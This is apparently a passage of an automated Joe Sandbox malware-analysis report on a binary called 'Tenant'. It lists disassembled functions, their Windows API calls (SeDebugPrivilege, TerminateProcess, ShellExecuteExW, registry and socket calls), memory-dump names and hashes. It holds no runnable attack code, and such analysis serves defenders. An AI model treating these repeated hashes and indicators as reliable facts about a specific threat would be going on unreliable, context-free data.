                                                                                        • GetLastError.KERNEL32 ref: 00B1F0A0
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1F0CF
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1F14C
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00B1F157
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1F18C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 1701285019-2896544425
                                                                                        • Opcode ID: c5b5d59adb34ce52039e2647f149e2a424cdf8a974035d2b647e4f192e9446a7
                                                                                        • Instruction ID: 54a845711db5f36f387f9c3da0bfed4ef4ae9d0155e5c4b429d809f3afbdf024
                                                                                        • Opcode Fuzzy Hash: c5b5d59adb34ce52039e2647f149e2a424cdf8a974035d2b647e4f192e9446a7
                                                                                        • Instruction Fuzzy Hash: 7641CD31204202AFD711EF64CDA5FBDB7E5AF84714F588499F902AB2D2CBB4A844CB85
                                                                                        Function 00B034DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00B0357C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 48aec774e2b1694658a893099d27536289f2a007e2ce6969f1e4f65565949e23
                                                                                        • Instruction ID: fef39b3cee460e7f1edd4fccd752091be0fe3095966587cf86b51284b79d40a0
                                                                                        • Opcode Fuzzy Hash: 48aec774e2b1694658a893099d27536289f2a007e2ce6969f1e4f65565949e23
                                                                                        • Instruction Fuzzy Hash: 2C110A72658B46BEEF005B14DCD6E6E7BDCDF25B60F2040EEFA00A61D1EB656F4046A0
                                                                                        Function 00B047E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B04802
                                                                                        • LoadStringW.USER32(00000000), ref: 00B04809
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0481F
                                                                                        • LoadStringW.USER32(00000000), ref: 00B04826
                                                                                        • _wprintf.LIBCMT ref: 00B0484C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0486A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00B04847
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 1d9080e7ee977ef82c69e633993615ed47f19d905e1eeeebbdd6bb2d1daeb944
                                                                                        • Instruction ID: f70f107e75c2a18b1918e21fe2306970761ffacbcbca567dcf66bc3fe648747f
                                                                                        • Opcode Fuzzy Hash: 1d9080e7ee977ef82c69e633993615ed47f19d905e1eeeebbdd6bb2d1daeb944
                                                                                        • Instruction Fuzzy Hash: 5F014FF29143087FE711A7A49D89EFA77ACEB08301F504595BB49E3041EF749E844B75
                                                                                        Function 00B2DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00B2DB42
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00B2DB62
                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2DD9D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2DDBB
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2DDDC
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00B2DDFB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B2DE20
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2DE43
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                        • String ID:
                                                                                        • API String ID: 1211466189-0
                                                                                        • Opcode ID: 6d2e6d60e568cf1b7b1ba8a4e77d77b916b6b90b220fd9fe95a148ff2f29cdfd
                                                                                        • Instruction ID: 40ca2374bd4dcea91667a4e8b87b978a7d38a5382786b427fbc17787a1201a22
                                                                                        • Opcode Fuzzy Hash: 6d2e6d60e568cf1b7b1ba8a4e77d77b916b6b90b220fd9fe95a148ff2f29cdfd
                                                                                        • Instruction Fuzzy Hash: A5B19831600225ABDF14CF69D9C97AD7BF1FF44701F0980A9EC48AF295DB74A950CBA0
                                                                                        Function 00B20371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2044E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3479070676-0
                                                                                        • Opcode ID: c4e84f4e1236382ae5a91df7f7636cc2fef8d020f0e9bfe9f8aeef2f2286a0dd
                                                                                        • Instruction ID: e58bd7beace786a7a64154d2083b6fe624d869f566a6ed369601d1a2fcec8821
                                                                                        • Opcode Fuzzy Hash: c4e84f4e1236382ae5a91df7f7636cc2fef8d020f0e9bfe9f8aeef2f2286a0dd
                                                                                        • Instruction Fuzzy Hash: EEA1B8302142159FCB11EF24D891F6EBBE5EF88314F14895DF99A8B2A2DB31E945CF42
                                                                                        Function 00AA2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00AA2E9F
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2EE7
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00ADC55B
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00ADC5C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 782ebc103dd8f465154b7a30856f0d0758d2bb7fe80a0ed1c3d6e63909496387
                                                                                        • Instruction ID: 20ad4cd3ff6ecc5b7c61d77c76118620cc1c9e0834ac68d60159a7c1e4945096
                                                                                        • Opcode Fuzzy Hash: 782ebc103dd8f465154b7a30856f0d0758d2bb7fe80a0ed1c3d6e63909496387
                                                                                        • Instruction Fuzzy Hash: 1D41F8306187819AD7399B2C998876A7FA2AF83310F64841EE447476E1CB75B9E0DB10
                                                                                        Function 00B07681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B07698
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B076CF
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00B076EB
                                                                                        • _memmove.LIBCMT ref: 00B07739
                                                                                        • _memmove.LIBCMT ref: 00B07756
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00B07765
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B0777A
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07799
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        • Opcode ID: 5980727cfeaf41f34e27457055646b2188f69d8da516ef0078bb2af34444fb34
                                                                                        • Instruction ID: 065947469beb6ed9d079065bd124557f2039be4f6c469c2c70bc2dcb87d902ca
                                                                                        • Opcode Fuzzy Hash: 5980727cfeaf41f34e27457055646b2188f69d8da516ef0078bb2af34444fb34
                                                                                        • Instruction Fuzzy Hash: 4E319231A04209EBCF10EF54DD85E6FBBB8EF45340B2540A9F904AB256DB70DE54DBA0
                                                                                        Function 00B267F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B26810
                                                                                        • GetDC.USER32(00000000), ref: 00B26818
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B26823
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B2682F
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B2686B
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B2687C
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B2964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B268B6
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B268D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: 79faebf4895a963b4c4ee23933844c6b229788a00856e91cff9059be003169b4
                                                                                        • Instruction ID: c598b1d9048399bd8f23b6621892264f049bc6f5c11ec659f48571f554121540
                                                                                        • Opcode Fuzzy Hash: 79faebf4895a963b4c4ee23933844c6b229788a00856e91cff9059be003169b4
                                                                                        • Instruction Fuzzy Hash: FF316D72111224BFEB159F10DC9AFAA3BADEF49761F044055FE089E291CB759C51CB70
                                                                                        Function 00AFC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: 3e5f3c40c8e94d39b44e84ab381fa34a8c0fe27e67fb7238c6979aaeb499d665
                                                                                        • Instruction ID: ef2a6c06cb56125954a0dbfa5e54ea01477814d73ab582e0490f43678b606a42
                                                                                        • Opcode Fuzzy Hash: 3e5f3c40c8e94d39b44e84ab381fa34a8c0fe27e67fb7238c6979aaeb499d665
                                                                                        • Instruction Fuzzy Hash: C921A772B0120D7BD60476528F82FBB77ECDE26BA4F144024FE06A6243E711DE1196E1
                                                                                        Function 00B0F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • _wcstok.LIBCMT ref: 00B0F2D7
                                                                                        • _wcscpy.LIBCMT ref: 00B0F366
                                                                                        • _memset.LIBCMT ref: 00B0F399
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 8fa0abfbd2a504f87250a78d621517fa50dc576d9ee3098a7accc92272ec6cac
                                                                                        • Instruction ID: a2ae9927cde3b42512735a3b24a6eef03ee97e7aa8a0303cdcd6edeefa029046
                                                                                        • Opcode Fuzzy Hash: 8fa0abfbd2a504f87250a78d621517fa50dc576d9ee3098a7accc92272ec6cac
                                                                                        • Instruction Fuzzy Hash: C7C18C716043419FC724EF64C995AAEBBE4FF85310F50496DF8999B2A2DB30EC45CB82
                                                                                        Function 00B171EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B172EB
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B1730C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B1731F
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00B173D5
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00B17392
                                                                                          • Part of subcall function 00AFB4EA: _strlen.LIBCMT ref: 00AFB4F4
                                                                                          • Part of subcall function 00AFB4EA: _memmove.LIBCMT ref: 00AFB516
                                                                                        • _strlen.LIBCMT ref: 00B1742F
                                                                                        • _memmove.LIBCMT ref: 00B17498
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        • Opcode ID: b085dc41aea119fb9e4c91347c427dac06e1580ebd54eac683ca1b863bf3eeac
                                                                                        • Instruction ID: c0d3b58aa1e3b9f388bd7a50df26a558469ad831376f0016408b1909721c84f2
                                                                                        • Opcode Fuzzy Hash: b085dc41aea119fb9e4c91347c427dac06e1580ebd54eac683ca1b863bf3eeac
                                                                                        • Instruction Fuzzy Hash: 3081CD71508200ABC310EB24DD91EAEB7F8EF89710F50455CF5569B2D2DF70AD85CBA1
                                                                                        Function 00AA1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6b2dbce5c6fdd5f1e6806fe0f16c30520fc5bbf828378bfd17e5aab5d2548a9
                                                                                        • Instruction ID: 00c7a9e93d52122754a7db776b58c7cfe05a6616be594c9a1064f053af2330a9
                                                                                        • Opcode Fuzzy Hash: d6b2dbce5c6fdd5f1e6806fe0f16c30520fc5bbf828378bfd17e5aab5d2548a9
                                                                                        • Instruction Fuzzy Hash: E9714B31900109FFDB059F58CC89EBEBB79FF8A354F248159F915AB291C7349A51CBA0
                                                                                        Function 00B2B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(01125678), ref: 00B2BA5D
                                                                                        • IsWindowEnabled.USER32(01125678), ref: 00B2BA69
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2BB4D
                                                                                        • SendMessageW.USER32(01125678,000000B0,?,?), ref: 00B2BB84
                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00B2BBC1
                                                                                        • GetWindowLongW.USER32(01125678,000000EC), ref: 00B2BBE3
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2BBFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID:
                                                                                        • API String ID: 4072528602-0
                                                                                        • Opcode ID: 780a111f83eec43e2e68ff47d76a941126c71e9ae31ca094aeeab223aad3fa59
                                                                                        • Instruction ID: 247230c48b9043f47a3db9ca246af4a71828109b87a10254a77b9316fcb4c1b2
                                                                                        • Opcode Fuzzy Hash: 780a111f83eec43e2e68ff47d76a941126c71e9ae31ca094aeeab223aad3fa59
                                                                                        • Instruction Fuzzy Hash: 7E71C134604225AFDB249F64E8D4FBA77F5EF4A300F1040D9E959972A1CF31AC51DB50
                                                                                        Function 00B1FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B1FB31
                                                                                        • _memset.LIBCMT ref: 00B1FBFA
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B1FC3F
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00B1FCB6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1FCE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        • Opcode ID: 8fc85140e94204779a9d8b495fb6b8fff46133f46ff5e5b91e4e2b6c5ba1d31e
